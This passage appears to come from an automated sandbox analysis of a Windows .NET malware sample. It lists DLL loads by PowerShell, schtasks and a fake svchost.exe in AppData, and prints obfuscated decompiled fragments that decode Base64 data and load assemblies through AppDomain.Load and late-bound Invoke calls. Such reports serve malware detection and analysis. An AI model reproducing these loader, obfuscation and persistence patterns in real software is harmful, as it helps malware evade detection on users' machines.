                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: file.exeStatic file information: File size 14791680 > 1048576
                  Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0xe1aa00
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr
                  Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.DDYxZ9fO4HnwYyEKU3kg5aJrNoY9fFz2zDKgv4SBC5X3bOl5X3c26WvQUnLjPTr,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.b2Zhz2yZImGfj8ogzhWd35jPDnVQ4lizEiYjv3wENhANkBMoZNttLmS1Wng4Z82,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.Ww3VTE1OcV55ItOgrtwc3FIyxSu4O8yF5oT3fIzcBFRRyVMz2OTJBqPScByA7v4,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.kg8WgIFrMTIjPzLXVZYSZ6Q6vNdi0aqzV6NRXZxBAgYiXUrmUoBDV9VQXptMapP,CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.DJt3jyhgcDbDUbh()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fVciQAHa1R64Zp2lFi5ZQi9[2],CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.PixMCeLDzvEnijS(Convert.FromBase64String(fVciQAHa1R64Zp2lFi5ZQi9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.DDYxZ9fO4HnwYyEKU3kg5aJrNoY9fFz2zDKgv4SBC5X3bOl5X3c26WvQUnLjPTr,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.b2Zhz2yZImGfj8ogzhWd35jPDnVQ4lizEiYjv3wENhANkBMoZNttLmS1Wng4Z82,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.Ww3VTE1OcV55ItOgrtwc3FIyxSu4O8yF5oT3fIzcBFRRyVMz2OTJBqPScByA7v4,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.kg8WgIFrMTIjPzLXVZYSZ6Q6vNdi0aqzV6NRXZxBAgYiXUrmUoBDV9VQXptMapP,CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.DJt3jyhgcDbDUbh()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fVciQAHa1R64Zp2lFi5ZQi9[2],CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.PixMCeLDzvEnijS(Convert.FromBase64String(fVciQAHa1R64Zp2lFi5ZQi9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: KzE02pfGPuRw4Lp7HTgcV3W System.AppDomain.Load(byte[])
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: _0DrM4fClbwsqX1efoo9bJeu System.AppDomain.Load(byte[])
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: _0DrM4fClbwsqX1efoo9bJeu
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: KzE02pfGPuRw4Lp7HTgcV3W System.AppDomain.Load(byte[])
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: _0DrM4fClbwsqX1efoo9bJeu System.AppDomain.Load(byte[])
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs.Net Code: _0DrM4fClbwsqX1efoo9bJeu
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7C0CC00BD pushad ; iretd 0_2_00007FF7C0CC00C1
                  Source: C:\Users\user\AppData\Roaming\All function.exeCode function: 2_2_00007FF7C0CC00BD pushad ; iretd 2_2_00007FF7C0CC00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0BBD2A5 pushad ; iretd 6_2_00007FF7C0BBD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF7C0DA2316 push 8B485F93h; iretd 6_2_00007FF7C0DA231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF7C0BBD2A5 pushad ; iretd 9_2_00007FF7C0BBD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF7C0CDC2C5 push ebx; iretd 9_2_00007FF7C0CDC2DA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF7C0DA2316 push 8B485F93h; iretd 9_2_00007FF7C0DA231B
                  Source: svchost.exe.0.dr, AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.csHigh entropy of concatenated method names: 'lsLMB0k1mzOloo8L67rwcvTn0PZhhQocNpqxrwQ4gZkiPqVhR3', 'PtZKB104eh9CXN8DSCxtOSNrPlKhxbRLgwm4Whiva4Typ1w8lV', 'bOqWL3TZwKGlR8VnMWcZeCD1LgqwmLWtdPNdRcm08gZwO78AgX', 'zQDsgPoZ144gf52sfvMHDOLPS599rx910W7UaPWeEwZXZc5Pt8'
                  Source: svchost.exe.0.dr, q8AGBWimCNl26cs.csHigh entropy of concatenated method names: 'pZG5FXTSQuziM5E', 'ZmgSJl8jUzxoda8', '_0KVNAk1dEQ98X0Y', '_9ifKH25q3nDqSHFXQDeQvIYDKqY', 'AQX1Gb1tuXIRXwV6LksEWs67NGQ', 'nrgYWWZT2Lbyyb0vzoXRhEWXsHp', 'FPp3q0Y24Jm0EGBhqrolWxQYYZ9', 'F7Eqbs2zS4TAU12Bv03bK0xZGyE', 'bQLATnzcempqKkBM1uQeYDjVNRT', 'zlm0V5w9judwigvxCjy0rjzLpRP'
                  Source: svchost.exe.0.dr, FY4tA6CMaVa4guGqTEmyXIf7xvr3iNtk7Lq6zTl2t38pIELcmF7U9sPLA2fruofSqNCGhqcw5vlPs.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tLd6ptJk33gbJAxVlr6JpGgKPGf0ATucNTSIQhMaD7O9MuOdgL', 'co1TLDrVkALa47756wT5Aih9k9LZYiSN7q6MDJ5Unl8LVnx3we', 'zYV42teDCCOEQB2bAsM1EDFpIYOhXm1hrpHNUyy8ROihue5G9m', '_5BlJwQSBtEeu8F40wMj6UFGwhUot5idctNfpZ5OQnh3qGsDyHd'
                  Source: svchost.exe.0.dr, aTyp4zdr7PWoY7yPB1HPKF7KaU9euWm7Dk5Krr5JV4qrSsUHcriImerWCgTplK7zRKiNfoXa3Ge67XHotQU60xBtJ8aXDQD.csHigh entropy of concatenated method names: 'MzhLZg0kBXgQJBqhXKR6IFFTxRk46y82hBGaGM7pgVMvmen2L7OijPvKm0Vpst1lmuuR4i2xyEvIe4YjrkQRtoaQLCr60kB', 'mdtq64VWI9UDHwFjNIujpkSpHcqb4LO7xEWyoj7rCrLsIhN0fpEF3QXczHhsxLIFP8hjCjZ2il0YGkYPo8AKuhjDM07dCeE', 'RaXaMZVo7nmo8HmTXnchTW1c39QnXklSdjqBFSgfJKzReVqH38n29xezdSXahfU3FqHQXja7US46QOKhdH5TqgL1TIyxHxK', 'hpxrO9lHZ6xwksMIczZ8iE5GU7xaEbqbps4bVYrnw56oVy49Ef4dVoJ7zE8Tgx4P4crZN7upY33YIj7h4aZrVedHJvzsGuP', 'H6c0spaFMhUx7BwrU88KHvlbTu7ZdUAw17YWd0AM4TPmmht2e6EUIZKo4ZYLTAOqRhXl3DiKckyfKlECLPHEg4TOr5FaIbb', 'BOLrYdREAu7YNI2QeZKOzwFV4qlmpKZLYslgrUQrRlv33dvDbrenujU6OYVQgt7eGV6CNeowazc2togmGmA3Bz5jesaA9kh', '_5DA7hCEjltuvNA3G7njPLqSUecSRIv7aLkPIMVQpL4tIeev0mGEEWq4mxq57lDnG19RuuUFbYmtqJ6WfS1N7TkHjudGNAGX', 'JqpykSZiAlfZlfFNZltf6ro7xqBSmAN24blsxOvy4xXn8MQlvrcGr3EJn0OzjrbaCA6znZG095GPhMDJJrylTVnLZ8VydXB', 'NBBOvdG7lOl160aIetgUtUcGfJFYBnCMTwZuGCD34YJFUW3QbNPxdign8V4JILQrpn40DjxusIRdyWkiLdFNi2P1NJdpJha', 'BgCpiVaL6yoKrzUeGYjZAZkQXOMbmjTmJGqmt'
                  Source: svchost.exe.0.dr, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csHigh entropy of concatenated method names: 'pV5GNxReLWRbJztxWoN9sFbvGSFZA9fztkgnX', 'IOD7ZNPqydZyQrn5bZEMryMseoy6VAlio52eF', 'R39w72dzlEQ0qHulDtuOonikHSqEMz2NNJoaF', 'F42jEzeOcNEd2Xt58ZYU0JTUk4RuRfxSZIdV6', 'RfDT7ZFrHp324DJgP9zgER7W7kOeiCRZk0fAd', 'jBk8hvmnS9ilhVS4ZvHDvZBpchL7mKgqUuSuA', 'MLSNXeBlz3HyiYeZo2CitJ2y6N1IpQ7vUQpHU', 'SsXmo3zo4c7qvLlX8zcoGrsl7P55Zt2yzDNdR', '_4uT9QBxjLIJ3XEoWHbPcxsOzOyLm5JU7UWKVa', '_5JXNMvFXLbhlzKyb8f6IiKdKM0xqlLinDIokq'
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.csHigh entropy of concatenated method names: 'XeZMHJ5Sai1NRcru3Ksv6Ao', 'KzE02pfGPuRw4Lp7HTgcV3W', 'uBURafDYEtltxUsxFTjURcZ', 'XuRibjFAKdTHjD3wsDvnXcY', 'lrGpa5TteqC7tSW6sipLB26', 'XWjMSZoEYV0x7mxEB9Yx8VO', 'EYJIG6PNQGOackyfhbbyQDZ', 'LOZhRT5vgBz7uxt9rznhXXp', 'XKWOYKGBIlqUFPfHLq3g2NZ', 'm44KyzrvV1sefEns8DE0CeX'
                  Source: svchost.exe.0.dr, 0m7DX7crYXoCR8NrxmQllWedGea94IvRkI5hOaDUfmiEXgVr36rOaeB.csHigh entropy of concatenated method names: 'QQWfdSG2xS4lD5bdBiEH1OpHPVxK7zcqFJKcXkutmFFjW7lDs4KuW16', 'jOxMM1N6OjprS07QpryZOFHddsoSjtz6kyIjtixcdbs7nE0jBYKdi5S', '_3a4q8G8H205iQsHOGehEiHoyUu9W5Tg8uF0usym5wOEsfoyB9KjBkDa', '_6HtZ7DyNcZ9QQHh5LzZvGDCNX8L3uRTB7yjimyzJa0vQoaG4Vbj6Rg3', 'QB2eNRYXINSW56QGLZXnFf6IpEnxt5NiwqCVzLK5AwXjhxcE5DvHZyQ', 'e7sI67VGSfSlIIKJZphNPZkmILVbC2Kg8g1UvzqyhybiBsnmeImcgtY', 'sGXHqYwXDZULYxK8gSGYFH4cRNvjM5OIf4NawRCEvYC721KExnK2hND', 'kCgCM7V1Aft4M3fuVYkOlVVEVriD7DTHnBI8ucFhzcRT3U8QXzmqy4l', 'OyDSV5z034Qg6wwSXL4llGVREs2vVJxntGddCJt0', 'zkJnnEAC1oKgBY8kIOZK9FA5Ahiu6ZgHhEZO6smM'
                  Source: svchost.exe.0.dr, CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.csHigh entropy of concatenated method names: 'VvUamQexaLlDSalFARrQ9qHIOZJfWN1iZ4ag2Lp7oXLz1MRSGNPbsd8Gt5Sr6obsftbYOmO9', 'zG3nb7fsHCEEysakSCoXMtXSWtu6P63EXfJ4trA16aN5TL0jpYPB67f1mF6VV5pI8Vhj3eH7', 'cv6Qnju0tteEsmlaLOWtJAIUXwmlh8WAwx7FxLcPmRTLURaW9D1BRuDD3JBghv32kkwIhqCl', 'WrTjibEG30Y876mYzzNigsYB4cCBy7OQP84LInxtko3aFLXPPwSmYXWBWNILr5vufz9siHuD', 'dHmqVMg6wdknYUDXNdNz9ouCv8mvI06UYX7QIYMIhYj1LrLh6JCxpEwD0hqsQbk2pbkrbJIa', 'gLf7Z007cJpisow', 'uZj9L9WKLXAHIID', 'nf23VrFvRsIEPgv', 'eNb920YNU2Y66xb', '_1e9PhazEhD3rZcw'
                  Source: svchost.exe.0.dr, 8KcBCZ9DCxKcKbF0FzfHqT16Ch1DMyJIO0Y5GGZtWjWIgyYVuRr4V5O.csHigh entropy of concatenated method names: 'rmYdAier1qI05Aechiv2ssjdZX9qhSbgOaAJ7uH4HlEgIdQL8TMnynq', 'X6bs1VKVEz', '_7vCg3MX6UP', 'f4ewYMWxqB', 'qGDDMD7OAG'
                  Source: svchost.exe.0.dr, ktrFv2sOGwgIA9mekycjF1J3zeN8nu5eTtArKzFhw4oWEqfOdr8PLFPBGGJc0G4nBLrrbImb.csHigh entropy of concatenated method names: 'D6awLwsnT57uNrWDTfeufUJG8coJ97yfrz6Shub48ttMidXaru6dE3ivDB2dT21wtypsvoIR', 'oc58B3p2e5VnNQkOzhef7lvysxQIFgrPZE7JwlyZW4NBEwbfqNgAGIGVhCN5C4euuvceBcCN', '_7hAEB9ijwrrolHvJH8x4xi1rQvEB5e4QwJeG3oIPmOwkKOVvFmTGhBZmbB4Z6pP57exSfdz8', 'j8Vl82dVthVO8INk3TupIUVcYJlhMamIQteNscY8sgRTPoUlGMbTLIKSPGluQlA0F5ikg1iR', '_1Ojp6wqZet', 'qdN8pelKqa', 'p1ATG6liVR', 'fxU4QSNMBd', 'zwpeOddA3A', 'HKX8PLsgAD'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.csHigh entropy of concatenated method names: 'lsLMB0k1mzOloo8L67rwcvTn0PZhhQocNpqxrwQ4gZkiPqVhR3', 'PtZKB104eh9CXN8DSCxtOSNrPlKhxbRLgwm4Whiva4Typ1w8lV', 'bOqWL3TZwKGlR8VnMWcZeCD1LgqwmLWtdPNdRcm08gZwO78AgX', 'zQDsgPoZ144gf52sfvMHDOLPS599rx910W7UaPWeEwZXZc5Pt8'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, q8AGBWimCNl26cs.csHigh entropy of concatenated method names: 'pZG5FXTSQuziM5E', 'ZmgSJl8jUzxoda8', '_0KVNAk1dEQ98X0Y', '_9ifKH25q3nDqSHFXQDeQvIYDKqY', 'AQX1Gb1tuXIRXwV6LksEWs67NGQ', 'nrgYWWZT2Lbyyb0vzoXRhEWXsHp', 'FPp3q0Y24Jm0EGBhqrolWxQYYZ9', 'F7Eqbs2zS4TAU12Bv03bK0xZGyE', 'bQLATnzcempqKkBM1uQeYDjVNRT', 'zlm0V5w9judwigvxCjy0rjzLpRP'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, FY4tA6CMaVa4guGqTEmyXIf7xvr3iNtk7Lq6zTl2t38pIELcmF7U9sPLA2fruofSqNCGhqcw5vlPs.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tLd6ptJk33gbJAxVlr6JpGgKPGf0ATucNTSIQhMaD7O9MuOdgL', 'co1TLDrVkALa47756wT5Aih9k9LZYiSN7q6MDJ5Unl8LVnx3we', 'zYV42teDCCOEQB2bAsM1EDFpIYOhXm1hrpHNUyy8ROihue5G9m', '_5BlJwQSBtEeu8F40wMj6UFGwhUot5idctNfpZ5OQnh3qGsDyHd'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, aTyp4zdr7PWoY7yPB1HPKF7KaU9euWm7Dk5Krr5JV4qrSsUHcriImerWCgTplK7zRKiNfoXa3Ge67XHotQU60xBtJ8aXDQD.csHigh entropy of concatenated method names: 'MzhLZg0kBXgQJBqhXKR6IFFTxRk46y82hBGaGM7pgVMvmen2L7OijPvKm0Vpst1lmuuR4i2xyEvIe4YjrkQRtoaQLCr60kB', 'mdtq64VWI9UDHwFjNIujpkSpHcqb4LO7xEWyoj7rCrLsIhN0fpEF3QXczHhsxLIFP8hjCjZ2il0YGkYPo8AKuhjDM07dCeE', 'RaXaMZVo7nmo8HmTXnchTW1c39QnXklSdjqBFSgfJKzReVqH38n29xezdSXahfU3FqHQXja7US46QOKhdH5TqgL1TIyxHxK', 'hpxrO9lHZ6xwksMIczZ8iE5GU7xaEbqbps4bVYrnw56oVy49Ef4dVoJ7zE8Tgx4P4crZN7upY33YIj7h4aZrVedHJvzsGuP', 'H6c0spaFMhUx7BwrU88KHvlbTu7ZdUAw17YWd0AM4TPmmht2e6EUIZKo4ZYLTAOqRhXl3DiKckyfKlECLPHEg4TOr5FaIbb', 'BOLrYdREAu7YNI2QeZKOzwFV4qlmpKZLYslgrUQrRlv33dvDbrenujU6OYVQgt7eGV6CNeowazc2togmGmA3Bz5jesaA9kh', '_5DA7hCEjltuvNA3G7njPLqSUecSRIv7aLkPIMVQpL4tIeev0mGEEWq4mxq57lDnG19RuuUFbYmtqJ6WfS1N7TkHjudGNAGX', 'JqpykSZiAlfZlfFNZltf6ro7xqBSmAN24blsxOvy4xXn8MQlvrcGr3EJn0OzjrbaCA6znZG095GPhMDJJrylTVnLZ8VydXB', 'NBBOvdG7lOl160aIetgUtUcGfJFYBnCMTwZuGCD34YJFUW3QbNPxdign8V4JILQrpn40DjxusIRdyWkiLdFNi2P1NJdpJha', 'BgCpiVaL6yoKrzUeGYjZAZkQXOMbmjTmJGqmt'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, Ft7ETrblGx06bJdGyU6mLTVZb1mxifdKIkz2S.csHigh entropy of concatenated method names: 'pV5GNxReLWRbJztxWoN9sFbvGSFZA9fztkgnX', 'IOD7ZNPqydZyQrn5bZEMryMseoy6VAlio52eF', 'R39w72dzlEQ0qHulDtuOonikHSqEMz2NNJoaF', 'F42jEzeOcNEd2Xt58ZYU0JTUk4RuRfxSZIdV6', 'RfDT7ZFrHp324DJgP9zgER7W7kOeiCRZk0fAd', 'jBk8hvmnS9ilhVS4ZvHDvZBpchL7mKgqUuSuA', 'MLSNXeBlz3HyiYeZo2CitJ2y6N1IpQ7vUQpHU', 'SsXmo3zo4c7qvLlX8zcoGrsl7P55Zt2yzDNdR', '_4uT9QBxjLIJ3XEoWHbPcxsOzOyLm5JU7UWKVa', '_5JXNMvFXLbhlzKyb8f6IiKdKM0xqlLinDIokq'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.csHigh entropy of concatenated method names: 'XeZMHJ5Sai1NRcru3Ksv6Ao', 'KzE02pfGPuRw4Lp7HTgcV3W', 'uBURafDYEtltxUsxFTjURcZ', 'XuRibjFAKdTHjD3wsDvnXcY', 'lrGpa5TteqC7tSW6sipLB26', 'XWjMSZoEYV0x7mxEB9Yx8VO', 'EYJIG6PNQGOackyfhbbyQDZ', 'LOZhRT5vgBz7uxt9rznhXXp', 'XKWOYKGBIlqUFPfHLq3g2NZ', 'm44KyzrvV1sefEns8DE0CeX'
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 0m7DX7crYXoCR8NrxmQllWedGea94IvRkI5hOaDUfmiEXgVr36rOaeB.csHigh entropy of concatenated method names: 'QQWfdSG2xS4lD5bdBiEH1OpHPVxK7zcqFJKcXkutmFFjW7lDs4KuW16', 'jOxMM1N6OjprS07QpryZOFHddsoSjtz6kyIjtixcdbs7nE0jBYKdi5S', '_3a4q8G8H205iQsHOGehEiHoyUu9W5Tg8uF0usym5wOEsfoyB9KjBkDa', '_6HtZ7DyNcZ9QQHh5LzZvGDCNX8L3uRTB7yjimyzJa0vQoaG4Vbj6Rg3', 'QB2eNRYXINSW56QGLZXnFf6IpEnxt5NiwqCVzLK5AwXjhxcE5DvHZyQ', 'e7sI67VGSfSlIIKJZphNPZkmILVbC2Kg8g1UvzqyhybiBsnmeImcgtY', 'sGXHqYwXDZULYxK8gSGYFH4cRNvjM5OIf4NawRCEvYC721KExnK2hND', 'kCgCM7V1Aft4M3fuVYkOlVVEVriD7DTHnBI8ucFhzcRT3U8QXzmqy4l', 'OyDSV5z034Qg6wwSXL4llGVREs2vVJxntGddCJt0', 'zkJnnEAC1oKgBY8kIOZK9FA5Ahiu6ZgHhEZO6smM'
